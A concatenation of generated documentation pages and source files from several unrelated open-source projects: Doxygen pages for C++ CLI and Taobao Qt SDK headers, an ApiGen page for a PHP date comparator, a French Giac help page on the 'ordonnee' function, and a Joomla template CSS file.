<a name="l00016"></a>00016 <span class="comment"> CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,</span>
<a name="l00017"></a>00017 <span class="comment"> EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,</span>
<a name="l00018"></a>00018 <span class="comment"> PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR</span>
<a name="l00019"></a>00019 <span class="comment"> PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF</span>
<a name="l00020"></a>00020 <span class="comment"> LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING</span>
<a name="l00021"></a>00021 <span class="comment"> NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS</span>
<a name="l00022"></a>00022 <span class="comment"> SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.</span>
<a name="l00023"></a>00023 <span class="comment">*/</span>
<a name="l00024"></a>00024
<a name="l00025"></a>00025
<a name="l00029"></a>00029
<a name="l00030"></a>00030 <span class="preprocessor">#ifndef _CLI_PARAM_STRING_H_</span>
<a name="l00031"></a>00031 <span class="preprocessor"></span><span class="preprocessor">#define _CLI_PARAM_STRING_H_</span>
<a name="l00032"></a>00032 <span class="preprocessor"></span>
<a name="l00033"></a>00033 <span class="preprocessor">#include "<a class="code" href="namespace_8h.html">cli/namespace.h</a>"</span>
<a name="l00034"></a>00034 <span class="preprocessor">#include "<a class="code" href="param_8h.html">cli/param.h</a>"</span>
<a name="l00035"></a>00035 <span class="preprocessor">#include "<a class="code" href="tk_8h.html">cli/tk.h</a>"</span>
<a name="l00036"></a>00036
<a name="l00037"></a>00037
<a name="l00038"></a>00038 <a class="code" href="namespace_8h.html#43bf79d829bcd245270f7ed0ba16155a">CLI_NS_BEGIN</a>(cli)
<a name="l00039"></a>00039
<a name="l00040"></a>00040 <span class="comment">// Forward declarations.</span>
<a name="l00041"></a>00041 class <a class="code" href="classHelp.html">Help</a>;
<a name="l00042"></a>00042
<a name="l00043"></a>00043
<a name="l00045"></a><a class="code" href="classParamString.html">00045</a> class <a class="code" href="classParamString.html">ParamString</a> : public <a class="code" href="classParam.html">Param</a>
<a name="l00046"></a>00046 {
<a name="l00047"></a>00047 <span class="keyword">private</span>:
<a name="l00049"></a>00049 <a class="code" href="classParamString.html">ParamString</a>(<span class="keywordtype">void</span>);
<a name="l00051"></a>00051 <a class="code" href="classParamString.html">ParamString</a>(<span class="keyword">const</span> <a class="code" href="classParamString.html">ParamString</a>&);
<a name="l00052"></a>00052
<a name="l00053"></a>00053 <span class="keyword">public</span>:
<a name="l00055"></a>00055 <a class="code" href="classParamString.html">ParamString</a>(
<a name="l00056"></a>00056 <span class="keyword">const</span> Help& CLI_Help
<a name="l00057"></a>00057 );
<a name="l00058"></a>00058
<a name="l00059"></a>00059 <span class="keyword">protected</span>:
<a name="l00061"></a>00061 <a class="code" href="classParamString.html">ParamString</a>(
<a name="l00062"></a>00062 <span class="keyword">const</span> <span class="keywordtype">char</span>* <span class="keyword">const</span> STR_Keyword,
<a name="l00063"></a>00063 <span class="keyword">const</span> Help& CLI_Help
<a name="l00064"></a>00064 );
<a name="l00065"></a>00065
<a name="l00066"></a>00066 <span class="keyword">public</span>:
<a name="l00068"></a>00068 <span class="keyword">virtual</span> ~<a class="code" href="classParamString.html">ParamString</a>(<span class="keywordtype">void</span>);
<a name="l00069"></a>00069
<a name="l00070"></a>00070 <span class="keyword">private</span>:
<a name="l00072"></a>00072 <a class="code" href="classParamString.html">ParamString</a>& operator=(<span class="keyword">const</span> <a class="code" href="classParamString.html">ParamString</a>&);
<a name="l00073"></a>00073
<a name="l00074"></a>00074 <span class="keyword">public</span>:
<a name="l00076"></a>00076 operator const char* const(<span class="keywordtype">void</span>) <span class="keyword">const</span>;
<a name="l00077"></a>00077
<a name="l00078"></a>00078 <span class="keyword">public</span>:
<a name="l00080"></a>00080 <span class="keyword">virtual</span> <span class="keyword">const</span> <span class="keywordtype">bool</span> SetstrValue(<span class="keyword">const</span> <span class="keywordtype">char</span>* <span class="keyword">const</span> STR_Value) <span class="keyword">const</span>;
<a name="l00081"></a>00081
<a name="l00083"></a>00083 <span class="keyword">virtual</span> <span class="keyword">const</span> Param& CopyValue(<span class="keyword">const</span> Param& CLI_Param) <span class="keyword">const</span>;
<a name="l00084"></a>00084
<a name="l00086"></a>00086 <span class="keyword">virtual</span> <span class="keyword">const</span> Param* <span class="keyword">const</span> Clone(<span class="keywordtype">void</span>) <span class="keyword">const</span>;
<a name="l00087"></a>00087
<a name="l00088"></a>00088 <span class="keyword">private</span>:
<a name="l00090"></a>00090 <span class="keyword">mutable</span> tk::String m_strValue;
<a name="l00091"></a>00091 };
<a name="l00092"></a>00092
<a name="l00093"></a>00093 <a class="code" href="namespace_8h.html#ccc91ffc41bd59ab273a690a7b425450">CLI_NS_END</a>(cli)
<a name="l00094"></a>00094
<a name="l00095"></a>00095 <span class="preprocessor">#endif // _CLI_PARAM_STRING_H_</span>
</pre></div><hr size="1"><address style="align: right;"><small>Generated on Mon Dec 12 23:20:27 2011 for CLI by
<a href="http://www.doxygen.org/index.html">
<img src="doxygen.png" alt="doxygen" align="middle" border="0"></a> 1.5.1 </small></address>
</body>
</html>
|
doc/HotelTypeNameGetRequest_8h_source.html | sd44/TaobaoCppQtSDK | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=9"/>
<meta name="generator" content="Doxygen 1.8.3.1"/>
<title>Taobao Cpp/Qt SDK: TaoApiCpp/request/HotelTypeNameGetRequest.h Source File</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="jquery.js"></script>
<script type="text/javascript" src="dynsections.js"></script>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/search.js"></script>
<script type="text/javascript">
$(document).ready(function() { searchBox.OnSelectItem(0); });
</script>
<link href="doxygen.css" rel="stylesheet" type="text/css" />
</head>
<body>
<div id="top"><!-- do not remove this div, it is closed by doxygen! -->
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">Taobao Cpp/Qt SDK
</div>
</td>
</tr>
</tbody>
</table>
</div>
<!-- end header part -->
<!-- Generated by Doxygen 1.8.3.1 -->
<script type="text/javascript">
var searchBox = new SearchBox("searchBox", "search",false,'Search');
</script>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li><a href="pages.html"><span>Related Pages</span></a></li>
<li><a href="annotated.html"><span>Classes</span></a></li>
<li class="current"><a href="files.html"><span>Files</span></a></li>
<li>
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Search" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="files.html"><span>File List</span></a></li>
<li><a href="globals.html"><span>File Members</span></a></li>
</ul>
</div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
<a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark"> </span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark"> </span>Classes</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark"> </span>Files</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(3)"><span class="SelectionMark"> </span>Functions</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(4)"><span class="SelectionMark"> </span>Variables</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(5)"><span class="SelectionMark"> </span>Pages</a></div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><a class="el" href="dir_5ced2c06884fa9bf5c2da90298abd959.html">TaoApiCpp</a></li><li class="navelem"><a class="el" href="dir_1128517a525300e3048e72552ab6f4a6.html">request</a></li> </ul>
</div>
</div><!-- top -->
<div class="header">
<div class="headertitle">
<div class="title">HotelTypeNameGetRequest.h</div> </div>
</div><!--header-->
<div class="contents">
<a href="HotelTypeNameGetRequest_8h.html">Go to the documentation of this file.</a><div class="fragment"><div class="line"><a name="l00001"></a><span class="lineno"> 1</span> <span class="preprocessor">#ifndef HOTELTYPENAMEGETREQUEST_H</span></div>
<div class="line"><a name="l00002"></a><span class="lineno"> 2</span> <span class="preprocessor"></span><span class="preprocessor">#define HOTELTYPENAMEGETREQUEST_H</span></div>
<div class="line"><a name="l00003"></a><span class="lineno"> 3</span> <span class="preprocessor"></span></div>
<div class="line"><a name="l00004"></a><span class="lineno"> 4</span> <span class="preprocessor">#include <<a class="code" href="TaoRequest_8h.html">TaoApiCpp/TaoRequest.h</a>></span></div>
<div class="line"><a name="l00005"></a><span class="lineno"> 5</span> <span class="preprocessor">#include <<a class="code" href="TaoParser_8h.html">TaoApiCpp/TaoParser.h</a>></span></div>
<div class="line"><a name="l00006"></a><span class="lineno"> 6</span> <span class="preprocessor">#include <<a class="code" href="HotelTypeNameGetResponse_8h.html">TaoApiCpp/response/HotelTypeNameGetResponse.h</a>></span></div>
<div class="line"><a name="l00007"></a><span class="lineno"> 7</span> </div>
<div class="line"><a name="l00013"></a><span class="lineno"><a class="code" href="classHotelTypeNameGetRequest.html"> 13</a></span> <span class="keyword">class </span><a class="code" href="classHotelTypeNameGetRequest.html">HotelTypeNameGetRequest</a> : <span class="keyword">public</span> <a class="code" href="classTaoRequest.html" title="Api请求基类。">TaoRequest</a></div>
<div class="line"><a name="l00014"></a><span class="lineno"> 14</span> {</div>
<div class="line"><a name="l00015"></a><span class="lineno"> 15</span>  <span class="keyword">public</span>:</div>
<div class="line"><a name="l00016"></a><span class="lineno"> 16</span>  <span class="keyword">virtual</span> QString <a class="code" href="classHotelTypeNameGetRequest.html#a2243284bfd5f6e3fd88365050e3127b4">getApiMethodName</a>() <span class="keyword">const</span>;</div>
<div class="line"><a name="l00017"></a><span class="lineno"> 17</span> </div>
<div class="line"><a name="l00018"></a><span class="lineno"> 18</span>  qlonglong <a class="code" href="classHotelTypeNameGetRequest.html#a411ab27c03aa702796fd961deac5bc91">getHid</a>() <span class="keyword">const</span></div>
<div class="line"><a name="l00019"></a><span class="lineno"> 19</span> ; <span class="keywordtype">void</span> <a class="code" href="classHotelTypeNameGetRequest.html#a2a940dd6251115b2eee369ff0c48c5fa">setHid</a> (qlonglong <a class="code" href="classHotelTypeNameGetRequest.html#ab78a1bb0b188e9423d72447595114496" title="要查询的酒店id。必须为数字">hid</a>);</div>
<div class="line"><a name="l00020"></a><span class="lineno"> 20</span> </div>
<div class="line"><a name="l00021"></a><span class="lineno"> 21</span>  QString <a class="code" href="classHotelTypeNameGetRequest.html#a50384cdad0f287f54646481b34e39080">getName</a>() <span class="keyword">const</span></div>
<div class="line"><a name="l00022"></a><span class="lineno"> 22</span> ; <span class="keywordtype">void</span> <a class="code" href="classHotelTypeNameGetRequest.html#ab5f3b97b7e834efd97cfc65c406aef7b">setName</a> (QString <a class="code" href="classHotelTypeNameGetRequest.html#ac25a3e40cfc0cec68def64ec6c65629f" title="房型全部名称/别名。不能超过60字节">name</a>);</div>
<div class="line"><a name="l00023"></a><span class="lineno"> 23</span> </div>
<div class="line"><a name="l00024"></a><span class="lineno"> 24</span> </div>
<div class="line"><a name="l00025"></a><span class="lineno"> 25</span>  <span class="keyword">virtual</span> <a class="code" href="classHotelTypeNameGetResponse.html" title="TOP RESPONSE API: 此接口用于查询一个房型,根据传入的酒店hid,房型名称/别名查询房型信息。">HotelTypeNameGetResponse</a> *<a class="code" href="classHotelTypeNameGetRequest.html#a667808922bcf3158d78d02eed2411363" title="发送请求,返回Reponse派生类。">getResponseClass</a>(<span class="keyword">const</span> QString &<a class="code" href="classTaoRequest.html#a9956848123bf21777fb605b4585a7c98">session</a> = <span class="stringliteral">""</span>,</div>
<div class="line"><a name="l00026"></a><span class="lineno"> 26</span>  <span class="keyword">const</span> QString &<a class="code" href="classTaoRequest.html#a7dcc6b71d454184a32a3f1c0adbc4a64">accessToken</a> = <span class="stringliteral">""</span>); </div>
<div class="line"><a name="l00027"></a><span class="lineno"> 27</span> </div>
<div class="line"><a name="l00028"></a><span class="lineno"> 28</span>  <span class="keyword">private</span>:</div>
<div class="line"><a name="l00032"></a><span class="lineno"><a class="code" href="classHotelTypeNameGetRequest.html#ab78a1bb0b188e9423d72447595114496"> 32</a></span>  qlonglong <a class="code" href="classHotelTypeNameGetRequest.html#ab78a1bb0b188e9423d72447595114496" title="要查询的酒店id。必须为数字">hid</a>;</div>
<div class="line"><a name="l00033"></a><span class="lineno"> 33</span> </div>
<div class="line"><a name="l00037"></a><span class="lineno"><a class="code" href="classHotelTypeNameGetRequest.html#ac25a3e40cfc0cec68def64ec6c65629f"> 37</a></span>  QString <a class="code" href="classHotelTypeNameGetRequest.html#ac25a3e40cfc0cec68def64ec6c65629f" title="房型全部名称/别名。不能超过60字节">name</a>;</div>
<div class="line"><a name="l00038"></a><span class="lineno"> 38</span> </div>
<div class="line"><a name="l00039"></a><span class="lineno"> 39</span> };</div>
<div class="line"><a name="l00040"></a><span class="lineno"> 40</span> </div>
<div class="line"><a name="l00041"></a><span class="lineno"> 41</span> <span class="preprocessor">#endif </span><span class="comment">/* HOTELTYPENAMEGETREQUEST_H */</span><span class="preprocessor"></span></div>
</div><!-- fragment --></div><!-- contents -->
<!-- start footer part -->
<hr class="footer"/><address class="footer"><small>
Generated on Sun Apr 14 2013 16:25:35 for Taobao Cpp/Qt SDK by  <a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/>
</a> 1.8.3.1
</small></address>
</body>
</html>
|
docs/source-class-DaybreakStudios.Common.DateTime.DateComparator.html | LartTyler/PHP-DaybreakCommons | <!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="robots" content="noindex">
<title>File DaybreakStudios/Common/DateTime/DateComparator.php</title>
<link rel="stylesheet" href="resources/bootstrap.min.css?973e37a8502921d56bc02bb55321f45b072b6f71">
<link rel="stylesheet" href="resources/style.css?49f43d3208c5d7e33fa16d36107a345bf11cc00d">
</head>
<body>
<nav id="navigation" class="navbar navbar-default navbar-fixed-top">
<div class="container-fluid">
<div class="navbar-header">
<a href="index.html" class="navbar-brand">Overview</a>
</div>
<div class="collapse navbar-collapse">
<form id="search" class="navbar-form navbar-left" role="search">
<input type="hidden" name="cx" value="">
<input type="hidden" name="ie" value="UTF-8">
<div class="form-group">
<input type="text" name="q" class="search-query form-control" placeholder="Search">
</div>
</form>
<ul class="nav navbar-nav">
<li>
<span>Namespace</span> </li>
<li>
<span>Class</span> </li>
<li class="divider-vertical"></li>
<li>
<a href="tree.html" title="Tree view of classes, interfaces, traits and exceptions"><span>Tree</span></a>
</li>
<li class="divider-vertical"></li>
<li>
<a href="API-documentation.zip" title="Download documentation as ZIP archive"><span>Download</span></a>
</li>
</ul>
</div>
</div>
</nav>
<div id="left">
<div id="menu">
<div id="groups">
<h3>Namespaces</h3>
<ul>
<li>
<a href="namespace-DaybreakStudios.html">
DaybreakStudios<span></span>
</a>
<ul>
<li>
<a href="namespace-DaybreakStudios.Common.html">
Common<span></span>
</a>
<ul>
<li>
<a href="namespace-DaybreakStudios.Common.Collection.html">
Collection </a>
</li>
<li>
<a href="namespace-DaybreakStudios.Common.Comparison.html">
Comparison </a>
</li>
<li>
<a href="namespace-DaybreakStudios.Common.DateTime.html">
DateTime </a>
</li>
<li>
<a href="namespace-DaybreakStudios.Common.Enum.html">
Enum<span></span>
</a>
<ul>
<li>
<a href="namespace-DaybreakStudios.Common.Enum.TwigCompat.html">
TwigCompat </a>
</li>
</ul></li>
<li>
<a href="namespace-DaybreakStudios.Common.IO.html">
IO </a>
</li>
<li>
<a href="namespace-DaybreakStudios.Common.Utility.html">
Utility </a>
</li>
<li>
<a href="namespace-DaybreakStudios.Common.Yaml.html">
Yaml </a>
</li>
</ul></li></ul></li>
</ul>
</div>
<div id="elements">
<h3>Classes</h3>
<ul>
<li><a href="class-DaybreakStudios.Common.Collection.ArrayList.html">DaybreakStudios\Common\Collection\ArrayList</a></li>
<li><a href="class-DaybreakStudios.Common.Collection.Collections.html">DaybreakStudios\Common\Collection\Collections</a></li>
<li><a href="class-DaybreakStudios.Common.Collection.EnumMap.html">DaybreakStudios\Common\Collection\EnumMap</a></li>
<li><a href="class-DaybreakStudios.Common.Collection.EnumSet.html">DaybreakStudios\Common\Collection\EnumSet</a></li>
<li><a href="class-DaybreakStudios.Common.Collection.SimpleEntry.html">DaybreakStudios\Common\Collection\SimpleEntry</a></li>
<li><a href="class-DaybreakStudios.Common.Collection.SimpleMap.html">DaybreakStudios\Common\Collection\SimpleMap</a></li>
<li><a href="class-DaybreakStudios.Common.Collection.SimpleSet.html">DaybreakStudios\Common\Collection\SimpleSet</a></li>
<li><a href="class-DaybreakStudios.Common.Comparison.SimpleComparatorComposition.html">DaybreakStudios\Common\Comparison\SimpleComparatorComposition</a></li>
<li><a href="class-DaybreakStudios.Common.DateTime.AbstractDateTimeAwareComparator.html">DaybreakStudios\Common\DateTime\AbstractDateTimeAwareComparator</a></li>
<li><a href="class-DaybreakStudios.Common.DateTime.DateComparator.html">DaybreakStudios\Common\DateTime\DateComparator</a></li>
<li><a href="class-DaybreakStudios.Common.DateTime.DateTimeComparator.html">DaybreakStudios\Common\DateTime\DateTimeComparator</a></li>
<li><a href="class-DaybreakStudios.Common.DateTime.TimeComparator.html">DaybreakStudios\Common\DateTime\TimeComparator</a></li>
<li><a href="class-DaybreakStudios.Common.Enum.Enum.html">DaybreakStudios\Common\Enum\Enum</a></li>
<li><a href="class-DaybreakStudios.Common.Enum.EnumUtil.html">DaybreakStudios\Common\Enum\EnumUtil</a></li>
<li><a href="class-DaybreakStudios.Common.Enum.TwigCompat.EnumExtension.html">DaybreakStudios\Common\Enum\TwigCompat\EnumExtension</a></li>
<li><a href="class-DaybreakStudios.Common.Enum.TwigCompat.EnumWrapper.html">DaybreakStudios\Common\Enum\TwigCompat\EnumWrapper</a></li>
<li><a href="class-DaybreakStudios.Common.IO.CsvFileReader.html">DaybreakStudios\Common\IO\CsvFileReader</a></li>
<li><a href="class-DaybreakStudios.Common.IO.FileReader.html">DaybreakStudios\Common\IO\FileReader</a></li>
<li><a href="class-DaybreakStudios.Common.Utility.Counter.html">DaybreakStudios\Common\Utility\Counter</a></li>
<li><a href="class-DaybreakStudios.Common.Yaml.Yaml.html">DaybreakStudios\Common\Yaml\Yaml</a></li>
</ul>
<h3>Interfaces</h3>
<ul>
<li><a href="class-DaybreakStudios.Common.Collection.Collection.html">DaybreakStudios\Common\Collection\Collection</a></li>
<li><a href="class-DaybreakStudios.Common.Collection.CollectionList.html">DaybreakStudios\Common\Collection\CollectionList</a></li>
<li><a href="class-DaybreakStudios.Common.Collection.Map.html">DaybreakStudios\Common\Collection\Map</a></li>
<li><a href="class-DaybreakStudios.Common.Collection.Set.html">DaybreakStudios\Common\Collection\Set</a></li>
<li><a href="class-DaybreakStudios.Common.Comparison.Comparator.html">DaybreakStudios\Common\Comparison\Comparator</a></li>
<li><a href="class-DaybreakStudios.Common.Comparison.ComparatorComposition.html">DaybreakStudios\Common\Comparison\ComparatorComposition</a></li>
<li><a href="class-DaybreakStudios.Common.IO.Reader.html">DaybreakStudios\Common\IO\Reader</a></li>
</ul>
<h3>Exceptions</h3>
<ul>
<li><a href="class-DaybreakStudios.Common.IO.IOException.html">DaybreakStudios\Common\IO\IOException</a></li>
</ul>
</div>
</div>
</div>
<div id="splitter"></div>
<div id="right">
<div id="rightInner">
<pre id="source"><code><span id="1" class="l"><a href="#1"> 1 </a><span class="xlang"><?php</span>
</span><span id="2" class="l"><a href="#2"> 2 </a> <span class="php-keyword1">namespace</span> DaybreakStudios\Common\DateTime;
</span><span id="3" class="l"><a href="#3"> 3 </a>
</span><span id="4" class="l"><a href="#4"> 4 </a> <span class="php-keyword1">use</span> \DateTimeZone;
</span><span id="5" class="l"><a href="#5"> 5 </a> <span class="php-keyword1">use</span> \InvalidArgumentException;
</span><span id="6" class="l"><a href="#6"> 6 </a>
</span><span id="7" class="l"><a href="#7"> 7 </a> <span class="php-keyword1">class</span> DateComparator <span class="php-keyword1">extends</span> AbstractDateTimeAwareComparator {
</span><span id="8" class="l"><a href="#8"> 8 </a> <span class="php-keyword1">public</span> <span class="php-keyword1">function</span> __construct() {
</span><span id="9" class="l"><a href="#9"> 9 </a> parent::__construct();
</span><span id="10" class="l"><a href="#10">10 </a> }
</span><span id="11" class="l"><a href="#11">11 </a>
</span><span id="12" class="l"><a href="#12">12 </a> <span class="php-keyword1">public</span> <span class="php-keyword1">function</span> compare(<span class="php-var">$a</span>, <span class="php-var">$b</span>) {
</span><span id="13" class="l"><a href="#13">13 </a> <span class="php-keyword1">if</span> (!<span class="php-var">$this</span>->accepts(<span class="php-var">$a</span>) || !<span class="php-var">$this</span>->accepts(<span class="php-var">$b</span>))
</span><span id="14" class="l"><a href="#14">14 </a> <span class="php-keyword1">throw</span> <span class="php-keyword1">new</span> InvalidArgumentException(<span class="php-quote">'Both arguments must be DateTime objects'</span>);
</span><span id="15" class="l"><a href="#15">15 </a>
</span><span id="16" class="l"><a href="#16">16 </a> <span class="php-var">$tz</span> = <span class="php-keyword1">new</span> DateTimeZone(<span class="php-quote">'UTC'</span>);
</span><span id="17" class="l"><a href="#17">17 </a>
</span><span id="18" class="l"><a href="#18">18 </a> <span class="php-var">$a</span> = <span class="php-keyword1">clone</span> <span class="php-var">$a</span>;
</span><span id="19" class="l"><a href="#19">19 </a> <span class="php-var">$a</span>
</span><span id="20" class="l"><a href="#20">20 </a> ->setTime(<span class="php-num">0</span>, <span class="php-num">0</span>, <span class="php-num">0</span>)
</span><span id="21" class="l"><a href="#21">21 </a> ->setTimezone(<span class="php-var">$tz</span>);
</span><span id="22" class="l"><a href="#22">22 </a>
</span><span id="23" class="l"><a href="#23">23 </a> <span class="php-var">$b</span> = <span class="php-keyword1">clone</span> <span class="php-var">$b</span>;
</span><span id="24" class="l"><a href="#24">24 </a> <span class="php-var">$b</span>
</span><span id="25" class="l"><a href="#25">25 </a> ->setTime(<span class="php-num">0</span>, <span class="php-num">0</span>, <span class="php-num">0</span>)
</span><span id="26" class="l"><a href="#26">26 </a> ->setTimezone(<span class="php-var">$tz</span>);
</span><span id="27" class="l"><a href="#27">27 </a>
</span><span id="28" class="l"><a href="#28">28 </a> <span class="php-var">$diff</span> = <span class="php-var">$a</span>->getTimestamp() - <span class="php-var">$b</span>->getTimestamp();
</span><span id="29" class="l"><a href="#29">29 </a>
</span><span id="30" class="l"><a href="#30">30 </a> <span class="php-keyword1">if</span> (<span class="php-var">$diff</span> < <span class="php-num">0</span>)
</span><span id="31" class="l"><a href="#31">31 </a> <span class="php-keyword1">return</span> -<span class="php-num">1</span>;
</span><span id="32" class="l"><a href="#32">32 </a> <span class="php-keyword1">else</span> <span class="php-keyword1">if</span> (<span class="php-var">$diff</span> === <span class="php-num">0</span>)
</span><span id="33" class="l"><a href="#33">33 </a> <span class="php-keyword1">return</span> <span class="php-num">0</span>;
</span><span id="34" class="l"><a href="#34">34 </a> <span class="php-keyword1">else</span>
</span><span id="35" class="l"><a href="#35">35 </a> <span class="php-keyword1">return</span> <span class="php-num">1</span>;
</span><span id="36" class="l"><a href="#36">36 </a> }
</span><span id="37" class="l"><a href="#37">37 </a> }
</span><span id="38" class="l"><a href="#38">38 </a><span class="xlang">?></span></span></code></pre>
</div>
<div id="footer">
API documentation generated by <a href="http://apigen.org">ApiGen</a>
</div>
</div>
<script src="resources/combined.js?533e23ef2f02bd4b20548834a028566b6eb403e0"></script>
<script src="elementlist.js?9a2eb62d04e2453127e6cfde271f1c8823c2bf6a"></script>
</body>
</html>
|
giac/giac-1.2.2/doc/fr/cascmd_fr/cascmd_fr933.html | hiplayer/giac | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/REC-html40/loose.dtd">
<HTML>
<HEAD>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<META name="GENERATOR" content="hevea 1.10">
<LINK rel="stylesheet" type="text/css" href="cascmd_fr.css">
<TITLE>L’ordonnée d’un point ou d’un vecteur : ordinate ordonnee</TITLE>
</HEAD>
<BODY >
<A HREF="cascmd_fr932.html"><IMG SRC="previous_motif.gif" ALT="Previous"></A>
<A HREF="index.html"><IMG SRC="contents_motif.gif" ALT="Up"></A>
<A HREF="cascmd_fr934.html"><IMG SRC="next_motif.gif" ALT="Next"></A>
<HR>
<H3 CLASS="subsection"><A NAME="htoc1097">10.15.3</A> L’ordonnée d’un point ou d’un vecteur : <TT>ordinate ordonnee</TT></H3><P><A NAME="@default1801"></A><A NAME="@default1802"></A><A NAME="sec:ordonnee2"></A>
<B>Voir aussi :</B> <A HREF="cascmd_fr1031.html#sec:ordonnee3">11.12.2</A> pour la géométrie 3-d.<BR>
<TT>ordonnee</TT>, en géométrie plane, est une fonction ayant
comme argument un point ou un vecteur ou un nombre complexe.<BR>
<TT>ordonnee</TT> renvoie l’ordonnée du point ou du vecteur :<BR>
- si le point <TT>A</TT> a pour coordonnées cartésiennes (<I>x</I><SUB><I>A</I></SUB>,<I>y</I><SUB><I>A</I></SUB>),
<TT>ordonnee(A)</TT> renvoie <I>y</I><SUB><I>A</I></SUB>,<BR>
- si le point <TT>B</TT> a pour coordonnées cartésiennes (<I>x</I><SUB><I>B</I></SUB>,<I>y</I><SUB><I>B</I></SUB>),
<TT>ordonnee(A-B)</TT> renvoie <I>y</I><SUB><I>A</I></SUB>−<I>y</I><SUB><I>B</I></SUB> (<TT>A-B</TT> désigne
le vecteur <I>BA</I>).<BR>
On tape :
</P><DIV CLASS="center"><TT>ordonnee(point(1+2*i))</TT></DIV><P>
On obtient :
</P><DIV CLASS="center"><TT>2</TT></DIV><P>
On tape :
</P><DIV CLASS="center"><TT>ordonnee(point(i)-point(1+2*i))</TT></DIV><P>
On obtient :
</P><DIV CLASS="center"><TT>-1</TT></DIV><P>
On tape :
</P><DIV CLASS="center"><TT>ordonnee(1+2*i)</TT></DIV><P>
On obtient :
</P><DIV CLASS="center"><TT>2</TT></DIV><P>
On tape :
</P><DIV CLASS="center"><TT>ordonnee([1,2])</TT></DIV><P>
On obtient :
</P><DIV CLASS="center"><TT>2</TT></DIV><HR>
<A HREF="cascmd_fr932.html"><IMG SRC="previous_motif.gif" ALT="Previous"></A>
<A HREF="index.html"><IMG SRC="contents_motif.gif" ALT="Up"></A>
<A HREF="cascmd_fr934.html"><IMG SRC="next_motif.gif" ALT="Next"></A>
</BODY>
</HTML>
|
templates/gk_creativity/css/system/offline.style3.css | magnusmel/mygavick | /*
#------------------------------------------------------------------------
# Creativity - May Joomla! template (for Joomla 2.5)
#
# Copyright (C) 2007-2013 Gavick.com. All Rights Reserved.
# License: Copyrighted Commercial Software
# Website: http://www.gavick.com
# Support: support@gavick.com
*/
/* Basic elements */
html {
height: 100%;
}
body, html {
margin: 0;
min-height: 100%;
padding: 0;
}
body {
background: #81ac8b;
color: #fff;
font-family: 'Open Sans', Arial, sans-serif;
font-size: 16px;
font-weight: 300;
line-height: 2;
min-height: 100%;
padding: 0;
text-align: center;
word-wrap: break-word;
}
a {
-webkit-transition: background .3s cubic-bezier(.17, .67, .88, 1.25), color .2s linear;
-moz-transition: background .3s cubic-bezier(.17, .67, .88, 1.25), color .2s linear;
-o-transition: background .3s cubic-bezier(.17, .67, .88, 1.25), color .2s linear;
transition: background .3s cubic-bezier(.17, .67, .88, 1.25), color .2s linear;
color: #fff;
text-decoration: none;
}
a:hover,
a:active,
a:focus {
color: #c8dacc;
}
body button,
body input,
body select,
body textarea {
font: 300 16px/2 Arial, sans-serif
}
/* Logo */
#gkLogo {
-webkit-transition: background-color .3s linear;
-moz-transition: background-color .3s linear;
-ms-transition: background-color .3s linear;
-o-transition: background-color .3s linear;
transition: background-color .3s linear;
display: block;
padding: 0;
text-indent: -999em;
text-shadow: none;
}
#gkLogo img {
display: block;
margin: 0 auto;
}
#gkLogo.cssLogo {
height: 74px;
width: 130px;
}
#gkLogo.text {
display: block;
font-family: Arial, sans-serif;
font-size: 36px;
font-weight: bold;
line-height: 1;
height: auto;
margin: 0;
overflow: hidden;
padding: 15px 5px;
text-indent: 0;
text-transform: uppercase;
width: auto;
}
